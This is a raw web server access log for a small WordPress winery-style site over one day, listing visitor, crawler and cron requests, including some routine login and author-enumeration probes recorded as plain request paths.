80.32.150.34 - - [02/Feb/2020:07:12:44 +0100] "GET /wp-content/themes/book-lite/js/small-menu.js?ver=20120206 HTTP/1.1" 200 1623 "https://fincasandoval.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Safari/604.1"
80.32.150.34 - - [02/Feb/2020:07:12:44 +0100] "GET /wp-content/themes/book-lite/style.css?ver=5.2.5 HTTP/1.1" 200 21109 "https://fincasandoval.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Safari/604.1"
80.32.150.34 - - [02/Feb/2020:07:12:44 +0100] "GET /wp-content/themes/book-lite/js/script.js?ver=1.0 HTTP/1.1" 200 624 "https://fincasandoval.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Safari/604.1"
80.32.150.34 - - [02/Feb/2020:07:12:44 +0100] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 13507 "https://fincasandoval.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Safari/604.1"
80.32.150.34 - - [02/Feb/2020:07:12:44 +0100] "GET /wp-includes/js/wp-embed.min.js?ver=5.2.5 HTTP/1.1" 200 1767 "https://fincasandoval.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Safari/604.1"
80.32.150.34 - - [02/Feb/2020:07:12:44 +0100] "GET /wp-content/uploads/2017/05/vs-2016.jpg HTTP/1.1" 200 25846 "https://fincasandoval.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Safari/604.1"
80.32.150.34 - - [02/Feb/2020:07:12:44 +0100] "GET /wp-includes/js/jquery/jquery.js?ver=1.12.4-wp HTTP/1.1" 200 100470 "https://fincasandoval.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Safari/604.1"
80.32.150.34 - - [02/Feb/2020:07:12:44 +0100] "GET /wp-content/themes/book-lite/images/diamond-white.png HTTP/1.1" 200 565 "https://fincasandoval.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Safari/604.1"
80.32.150.34 - - [02/Feb/2020:07:12:44 +0100] "GET /wp-content/themes/book-lite/images/nav-bg.png HTTP/1.1" 200 458 "https://fincasandoval.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Safari/604.1"
80.32.150.34 - - [02/Feb/2020:07:12:44 +0100] "GET /wp-content/uploads/2019/09/cropped-header-1.jpg HTTP/1.1" 200 45807 "https://fincasandoval.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Safari/604.1"
80.32.150.34 - - [02/Feb/2020:07:12:44 +0100] "GET /wp-content/themes/book-lite/images/break.png HTTP/1.1" 200 951 "https://fincasandoval.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Safari/604.1"
80.32.150.34 - - [02/Feb/2020:07:12:44 +0100] "GET /wp-content/uploads/2014/11/fs-1.jpg?w=625 HTTP/1.1" 200 639596 "https://fincasandoval.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Safari/604.1"
80.32.150.34 - - [02/Feb/2020:07:12:44 +0100] "GET /favicon.ico HTTP/1.1" 200 8882 "https://fincasandoval.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Safari/604.1"
89.248.107.232 - - [02/Feb/2020:08:10:39 +0100] "POST /wp-cron.php?doing_wp_cron=1580627439.5683319568634033203125 HTTP/1.1" 200 1860 "-" "WordPress/5.2.5; https://fincasandoval.com"
159.89.190.254 - - [02/Feb/2020:08:10:39 +0100] "GET /wp-login.php HTTP/1.1" 200 6587 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
159.89.190.254 - - [02/Feb/2020:08:10:39 +0100] "POST /wp-login.php HTTP/1.1" 200 7562 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
159.89.190.254 - - [02/Feb/2020:08:10:41 +0100] "GET /wp-login.php HTTP/1.1" 200 6587 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
159.89.190.254 - - [02/Feb/2020:08:10:42 +0100] "POST /wp-login.php HTTP/1.1" 200 7562 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
163.172.148.62 - - [02/Feb/2020:08:14:53 +0100] "GET / HTTP/1.1" 200 17567 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
203.133.169.54 - - [02/Feb/2020:08:34:48 +0100] "GET /robots.txt HTTP/1.1" 404 4433 "-" "Mozilla/5.0 (compatible; Daum/4.1; +http://cs.daum.net/faq/15/4118.html?faqId=28966)"
203.133.169.54 - - [02/Feb/2020:08:34:51 +0100] "GET / HTTP/1.1" 200 17762 "-" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1"
203.133.169.54 - - [02/Feb/2020:08:34:51 +0100] "GET /wp-includes/js/wp-emoji-release.min.js?ver=5.2.5 HTTP/1.1" 200 14206 "https://fincasandoval.com/" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1"
203.133.169.54 - - [02/Feb/2020:08:34:52 +0100] "GET /wp-includes/js/jquery/jquery.js?ver=1.12.4-wp HTTP/1.1" 200 97385 "https://fincasandoval.com/" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1"
203.133.169.54 - - [02/Feb/2020:08:34:52 +0100] "GET /wp-content/themes/book-lite/js/small-menu.js?ver=20120206 HTTP/1.1" 200 1766 "https://fincasandoval.com/" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1"
203.133.169.54 - - [02/Feb/2020:08:34:52 +0100] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10565 "https://fincasandoval.com/" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1"
203.133.169.54 - - [02/Feb/2020:08:34:52 +0100] "GET /wp-content/themes/book-lite/js/script.js?ver=1.0 HTTP/1.1" 200 767 "https://fincasandoval.com/" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1"
203.133.169.54 - - [02/Feb/2020:08:34:52 +0100] "GET /wp-includes/js/wp-embed.min.js?ver=5.2.5 HTTP/1.1" 200 1910 "https://fincasandoval.com/" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) Safari/538.1 Daum/4.1"
203.133.169.54 - - [02/Feb/2020:08:34:59 +0100] "GET /nuestrosvinos/ HTTP/1.1" 404 4433 "-" "Mozilla/5.0 (compatible; Daum/4.1; +http://cs.daum.net/faq/15/4118.html?faqId=28966)"
52.44.119.95 - - [02/Feb/2020:08:57:16 +0100] "GET /ads.txt HTTP/1.1" 404 4470 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
52.44.119.95 - - [02/Feb/2020:08:57:17 +0100] "GET /ads.txt HTTP/1.1" 404 4470 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
207.46.13.225 - - [02/Feb/2020:09:21:17 +0100] "GET /wp-content/uploads/2014/11/fs-7.jpg?w=625 HTTP/1.1" 200 504641 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
199.58.86.211 - - [02/Feb/2020:09:25:29 +0100] "GET /robots.txt HTTP/1.1" 404 4665 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
89.248.107.232 - - [02/Feb/2020:09:25:33 +0100] "POST /wp-cron.php?doing_wp_cron=1580631933.6119139194488525390625 HTTP/1.1" 200 1860 "-" "WordPress/5.2.5; https://fincasandoval.com"
199.58.86.211 - - [02/Feb/2020:09:25:33 +0100] "GET / HTTP/1.1" 200 14422 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
199.58.86.211 - - [02/Feb/2020:09:25:35 +0100] "GET /robots.txt HTTP/1.1" 404 4665 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
199.58.86.211 - - [02/Feb/2020:09:25:59 +0100] "GET / HTTP/1.1" 301 3611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
199.58.86.211 - - [02/Feb/2020:09:26:01 +0100] "GET / HTTP/1.1" 200 17701 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
89.248.107.232 - - [02/Feb/2020:10:04:14 +0100] "POST /wp-cron.php?doing_wp_cron=1580634254.2000660896301269531250 HTTP/1.1" 200 1860 "-" "WordPress/5.2.5; https://fincasandoval.com"
198.27.85.233 - - [02/Feb/2020:10:04:14 +0100] "GET / HTTP/1.1" 200 17511 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.5; rv:15.0) Gecko/20100101 Firefox/15.0.1"
66.249.64.92 - - [02/Feb/2020:10:21:19 +0100] "GET /robots.txt HTTP/1.1" 404 4665 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.92 - - [02/Feb/2020:10:21:19 +0100] "GET /contacto/ HTTP/1.1" 404 1385 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.86.164.102 - - [02/Feb/2020:10:33:03 +0100] "GET /wp-login.php HTTP/1.1" 200 7045 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.86.164.102 - - [02/Feb/2020:10:33:03 +0100] "POST /wp-login.php HTTP/1.1" 200 4633 "https://fincasandoval.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
157.55.39.61 - - [02/Feb/2020:10:34:23 +0100] "GET / HTTP/1.1" 200 17757 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
89.248.107.232 - - [02/Feb/2020:10:50:52 +0100] "POST /wp-cron.php?doing_wp_cron=1580637052.9837749004364013671875 HTTP/1.1" 200 1860 "-" "WordPress/5.2.5; https://fincasandoval.com"
154.51.131.142 - - [02/Feb/2020:10:50:52 +0100] "GET / HTTP/1.1" 200 18004 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
207.46.13.154 - - [02/Feb/2020:11:19:39 +0100] "GET /robots.txt HTTP/1.1" 404 4665 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
157.55.39.61 - - [02/Feb/2020:11:19:50 +0100] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 13702 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.248.107.232 - - [02/Feb/2020:11:19:51 +0100] "POST /wp-cron.php?doing_wp_cron=1580638791.6072349548339843750000 HTTP/1.1" 200 1860 "-" "WordPress/5.2.5; https://fincasandoval.com"
157.55.39.61 - - [02/Feb/2020:11:19:51 +0100] "GET /?feed=rss2&author=1 HTTP/1.1" 200 5477 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.154 - - [02/Feb/2020:11:20:04 +0100] "GET /wp-content/themes/book-lite/js/small-menu.js?ver=20120206 HTTP/1.1" 200 4903 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.154 - - [02/Feb/2020:11:20:04 +0100] "GET /wp-includes/css/dist/block-library/style.min.css?ver=5.2.5 HTTP/1.1" 200 29676 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.71 - - [02/Feb/2020:11:20:09 +0100] "GET /wp-content/themes/book-lite/js/script.js?ver=1.0 HTTP/1.1" 200 3904 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.71 - - [02/Feb/2020:11:20:09 +0100] "GET /wp-content/uploads/2019/09/cropped-header-1.jpg HTTP/1.1" 200 45807 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.71 - - [02/Feb/2020:11:20:09 +0100] "GET /wp-includes/js/wp-emoji-release.min.js?ver=5.2.5 HTTP/1.1" 200 14206 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.225 - - [02/Feb/2020:11:20:42 +0100] "GET /wp-content/themes/book-lite/style.css?ver=5.2.5 HTTP/1.1" 200 24251 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.225 - - [02/Feb/2020:11:20:43 +0100] "GET /wp-includes/js/jquery/jquery.js?ver=1.12.4-wp HTTP/1.1" 200 97385 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.248.107.232 - - [02/Feb/2020:11:49:59 +0100] "POST /wp-cron.php?doing_wp_cron=1580640599.2881760597229003906250 HTTP/1.1" 200 1860 "-" "WordPress/5.2.5; https://fincasandoval.com"
217.146.1.194 - - [02/Feb/2020:11:49:59 +0100] "GET / HTTP/1.1" 200 17757 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/90.2.291178541 Mobile/15E148 Safari/605.1"
217.146.1.194 - - [02/Feb/2020:11:49:59 +0100] "GET /wp-includes/js/wp-emoji-release.min.js?ver=5.2.5 HTTP/1.1" 200 14206 "https://fincasandoval.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/90.2.291178541 Mobile/15E148 Safari/605.1"
217.146.1.194 - - [02/Feb/2020:11:49:59 +0100] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10422 "https://fincasandoval.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/90.2.291178541 Mobile/15E148 Safari/605.1"
217.146.1.194 - - [02/Feb/2020:11:50:00 +0100] "GET /wp-content/themes/book-lite/js/small-menu.js?ver=20120206 HTTP/1.1" 200 1623 "https://fincasandoval.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/90.2.291178541 Mobile/15E148 Safari/605.1"
217.146.1.194 - - [02/Feb/2020:11:50:00 +0100] "GET /wp-content/themes/book-lite/js/script.js?ver=1.0 HTTP/1.1" 200 624 "https://fincasandoval.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/90.2.291178541 Mobile/15E148 Safari/605.1"
217.146.1.194 - - [02/Feb/2020:11:50:00 +0100] "GET /wp-includes/css/dist/block-library/style.min.css?ver=5.2.5 HTTP/1.1" 200 32956 "https://fincasandoval.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/90.2.291178541 Mobile/15E148 Safari/605.1"
217.146.1.194 - - [02/Feb/2020:11:50:00 +0100] "GET /wp-includes/js/wp-embed.min.js?ver=5.2.5 HTTP/1.1" 200 1767 "https://fincasandoval.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/90.2.291178541 Mobile/15E148 Safari/605.1"
217.146.1.194 - - [02/Feb/2020:11:50:00 +0100] "GET /wp-content/uploads/2017/05/vs-2016.jpg HTTP/1.1" 200 25846 "https://fincasandoval.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/90.2.291178541 Mobile/15E148 Safari/605.1"
217.146.1.194 - - [02/Feb/2020:11:50:00 +0100] "GET /wp-content/themes/book-lite/style.css?ver=5.2.5 HTTP/1.1" 200 24251 "https://fincasandoval.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/90.2.291178541 Mobile/15E148 Safari/605.1"
217.146.1.194 - - [02/Feb/2020:11:50:00 +0100] "GET /wp-content/uploads/2014/11/fs-1.jpg?w=625 HTTP/1.1" 200 639596 "https://fincasandoval.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/90.2.291178541 Mobile/15E148 Safari/605.1"
217.146.1.194 - - [02/Feb/2020:11:50:00 +0100] "GET /wp-includes/js/jquery/jquery.js?ver=1.12.4-wp HTTP/1.1" 200 100665 "https://fincasandoval.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/90.2.291178541 Mobile/15E148 Safari/605.1"
217.146.1.194 - - [02/Feb/2020:11:50:01 +0100] "GET /wp-content/themes/book-lite/images/nav-bg.png HTTP/1.1" 200 458 "https://fincasandoval.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/90.2.291178541 Mobile/15E148 Safari/605.1"
217.146.1.194 - - [02/Feb/2020:11:50:01 +0100] "GET /wp-content/uploads/2019/09/cropped-header-1.jpg HTTP/1.1" 200 45807 "https://fincasandoval.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/90.2.291178541 Mobile/15E148 Safari/605.1"
217.146.1.194 - - [02/Feb/2020:11:50:01 +0100] "GET /wp-content/themes/book-lite/images/diamond-white.png HTTP/1.1" 200 565 "https://fincasandoval.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/90.2.291178541 Mobile/15E148 Safari/605.1"
217.146.1.194 - - [02/Feb/2020:11:50:01 +0100] "GET /wp-content/themes/book-lite/images/break.png HTTP/1.1" 200 951 "https://fincasandoval.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/90.2.291178541 Mobile/15E148 Safari/605.1"
207.46.13.154 - - [02/Feb/2020:12:21:49 +0100] "GET /wp-content/themes/book-lite/images/break.png HTTP/1.1" 200 4231 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.225 - - [02/Feb/2020:12:21:54 +0100] "GET /wp-content/themes/book-lite/images/diamond-white.png HTTP/1.1" 200 3845 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.225 - - [02/Feb/2020:12:21:54 +0100] "GET /wp-content/themes/book-lite/images/nav-bg.png HTTP/1.1" 200 458 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.248.107.232 - - [02/Feb/2020:12:36:40 +0100] "POST /wp-cron.php?doing_wp_cron=1580643400.1163270473480224609375 HTTP/1.1" 200 1860 "-" "WordPress/5.2.5; https://fincasandoval.com"
5.144.130.21 - - [02/Feb/2020:12:36:39 +0100] "GET /wp-login.php HTTP/1.1" 200 6587 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
5.144.130.21 - - [02/Feb/2020:12:36:41 +0100] "POST /wp-login.php HTTP/1.1" 200 7562 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
5.144.130.21 - - [02/Feb/2020:12:36:42 +0100] "GET /wp-login.php HTTP/1.1" 200 6587 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
5.144.130.21 - - [02/Feb/2020:12:36:44 +0100] "POST /wp-login.php HTTP/1.1" 200 7445 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
89.248.107.232 - - [02/Feb/2020:12:45:29 +0100] "POST /wp-cron.php?doing_wp_cron=1580643929.9823150634765625000000 HTTP/1.1" 200 1860 "-" "WordPress/5.2.5; https://fincasandoval.com"
60.2.159.90 - - [02/Feb/2020:12:45:29 +0100] "GET / HTTP/1.1" 200 16114 "-" "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0"
60.2.159.90 - - [02/Feb/2020:12:45:31 +0100] "GET /?author=1 HTTP/1.1" 200 10051 "-" "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0"
60.2.159.90 - - [02/Feb/2020:12:45:35 +0100] "GET /?author=2 HTTP/1.1" 404 10147 "-" "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0"
60.2.159.90 - - [02/Feb/2020:12:45:36 +0100] "GET /?author=3 HTTP/1.1" 404 10147 "-" "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0"
103.28.84.55 - - [02/Feb/2020:12:45:43 +0100] "GET /?author=3 HTTP/1.1" 404 11741 "-" "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0"
24.53.151.95 - - [02/Feb/2020:12:46:20 +0100] "GET /?author=4 HTTP/1.1" 404 11741 "-" "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0"
52.44.119.95 - - [02/Feb/2020:12:57:18 +0100] "GET /ads.txt HTTP/1.1" 404 4470 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
52.44.119.95 - - [02/Feb/2020:12:57:19 +0100] "GET /ads.txt HTTP/1.1" 404 4470 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
107.23.127.240 - - [02/Feb/2020:13:10:37 +0100] "GET /ads.txt HTTP/1.1" 404 4470 "-" "AdsTxtCrawler/1.0.2"
185.86.164.108 - - [02/Feb/2020:13:13:36 +0100] "GET /wp-login.php HTTP/1.1" 200 7045 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
89.248.107.232 - - [02/Feb/2020:13:13:36 +0100] "POST /wp-cron.php?doing_wp_cron=1580645616.2615621089935302734375 HTTP/1.1" 200 1860 "-" "WordPress/5.2.5; https://fincasandoval.com"
185.86.164.108 - - [02/Feb/2020:13:13:36 +0100] "POST /wp-login.php HTTP/1.1" 200 4633 "https://fincasandoval.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
89.248.107.232 - - [02/Feb/2020:14:00:42 +0100] "POST /wp-cron.php?doing_wp_cron=1580648442.7248499393463134765625 HTTP/1.1" 200 1860 "-" "WordPress/5.2.5; https://fincasandoval.com"
179.7.48.202 - - [02/Feb/2020:14:00:42 +0100] "GET / HTTP/1.1" 200 17757 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 7.0; SM-T713) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
179.7.48.202 - - [02/Feb/2020:14:00:43 +0100] "GET /wp-content/themes/book-lite/style.css?ver=5.2.5 HTTP/1.1" 200 24251 "https://fincasandoval.com/" "Mozilla/5.0 (Linux; Android 7.0; SM-T713) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
179.7.48.202 - - [02/Feb/2020:14:00:43 +0100] "GET /wp-includes/css/dist/block-library/style.min.css?ver=5.2.5 HTTP/1.1" 200 32956 "https://fincasandoval.com/" "Mozilla/5.0 (Linux; Android 7.0; SM-T713) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
179.7.48.202 - - [02/Feb/2020:14:00:43 +0100] "GET /wp-includes/js/jquery/jquery.js?ver=1.12.4-wp HTTP/1.1" 200 97385 "https://fincasandoval.com/" "Mozilla/5.0 (Linux; Android 7.0; SM-T713) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
179.7.48.202 - - [02/Feb/2020:14:00:43 +0100] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10560 "https://fincasandoval.com/" "Mozilla/5.0 (Linux; Android 7.0; SM-T713) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
179.7.48.202 - - [02/Feb/2020:14:00:43 +0100] "GET /wp-includes/js/wp-embed.min.js?ver=5.2.5 HTTP/1.1" 200 1767 "https://fincasandoval.com/" "Mozilla/5.0 (Linux; Android 7.0; SM-T713) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
179.7.48.202 - - [02/Feb/2020:14:00:43 +0100] "GET /wp-content/themes/book-lite/js/script.js?ver=1.0 HTTP/1.1" 200 624 "https://fincasandoval.com/" "Mozilla/5.0 (Linux; Android 7.0; SM-T713) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
179.7.48.202 - - [02/Feb/2020:14:00:43 +0100] "GET /wp-content/themes/book-lite/js/small-menu.js?ver=20120206 HTTP/1.1" 200 1761 "https://fincasandoval.com/" "Mozilla/5.0 (Linux; Android 7.0; SM-T713) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
179.7.48.202 - - [02/Feb/2020:14:00:44 +0100] "GET /wp-includes/js/wp-emoji-release.min.js?ver=5.2.5 HTTP/1.1" 200 14206 "https://fincasandoval.com/" "Mozilla/5.0 (Linux; Android 7.0; SM-T713) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
179.7.48.202 - - [02/Feb/2020:14:00:44 +0100] "GET /wp-content/uploads/2017/05/vs-2016.jpg HTTP/1.1" 200 25846 "https://fincasandoval.com/" "Mozilla/5.0 (Linux; Android 7.0; SM-T713) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
179.7.48.202 - - [02/Feb/2020:14:00:44 +0100] "GET /wp-content/themes/book-lite/images/nav-bg.png HTTP/1.1" 200 458 "https://fincasandoval.com/wp-content/themes/book-lite/style.css?ver=5.2.5" "Mozilla/5.0 (Linux; Android 7.0; SM-T713) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
179.7.48.202 - - [02/Feb/2020:14:00:44 +0100] "GET /wp-content/themes/book-lite/images/break.png HTTP/1.1" 200 1089 "https://fincasandoval.com/wp-content/themes/book-lite/style.css?ver=5.2.5" "Mozilla/5.0 (Linux; Android 7.0; SM-T713) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36"
